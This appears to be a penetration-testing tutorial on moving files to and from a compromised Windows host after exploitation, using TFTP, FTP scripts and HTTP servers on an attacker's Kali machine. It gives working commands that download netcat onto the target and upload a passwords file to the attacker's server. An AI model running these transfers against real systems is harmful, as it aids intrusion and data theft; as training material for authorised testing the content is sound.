After we gained a foothold on our target (exploitation) we want to upload and download files.
In our first stage we are limited to what the exploited target offers.
Some examples are:
- ftp (sftp / ftps)
- wget (http)
- bits (windows)
- custom scripts that make use of the available script interpreters:
- Powershell (windows)
- Visual Basic (windows)
Create a the tftp directory on our attacking host.
Start tftp server
Copy nc binary to tftp root
mkdir /tftp atftpd --daemon --port 69 /tftp cp /usr/share/windows-binaries/nc.exe /tftp/
Verify if tftp client is available on our target windows host:
C:\WINDOWS\system32>tftp tftp Transfers files to and from a remote computer running the TFTP service. TFTP [-i] host [GET | PUT] source [destination] -i Specifies binary image transfer mode (also called octet). In binary image mode the file is moved literally, byte by byte. Use this mode when transferring binary files. host Specifies the local or remote host. GET Transfers the file destination on the remote host to the file source on the local host. PUT Transfers the file source on the local host to the file destination on the remote host. source Specifies the file to transfer. destination Specifies where to transfer the file.
Download nc.exe via tftp on Windows platform
tftp -i <ipaddress of tftpserver> get nc.exe
Upload file from target to our tftp server:
tftp -i <ipaddress of tftpserver> put passwords.xls
Start FTP server on our attacking host (kali)
Installation and configuration of pure-ftp can be found here.
FTP on target
If we have FTP running on our target we can upload files via this service.
FTP client on target
If we have a FTP client on our target we can use this to download files from our attacking host.
On Windows we check if ftp.exe is available:
C:\WINDOWS\system32>dir ftp.* dir ftp.* Volume in drive C has no label. Volume Serial Number is 50C3-3741 Directory of C:\WINDOWS\system32 08/30/2002 02:00 PM 40,448 ftp.exe 08/30/2002 02:00 PM 6,179 ftp.mib 2 File(s) 46,627 bytes 0 Dir(s) 1,662,689,280 bytes free
If ftp.exe is available we have to create a inputfile with the ftp commands to execute.
(we can’t run ftp.exe inactive)
echo open 10.10.10.10 21> ftp.txt echo USER username>> ftp.txt echo password>> ftp.txt echo bin>> ftp.txt echo GET nc.exe>> ftp.txt echo bye>> ftp.txt
Run ftp.exe with inputfile
ftp -n -s:ftp.txt
Start HTTP server on our attacking host (kali)
We can start a HTTP server that service files to be downloaded by our target Start apache on kali
service apache2 start
Start python simplehttp server in the directory with the files you want to serve.
python -m SimpleHTTPServer 80
HTTP client on our target
On most linux host we have wget and curl available to download files via http.
On windows hosts we can use powershell or vbscript to download files via http.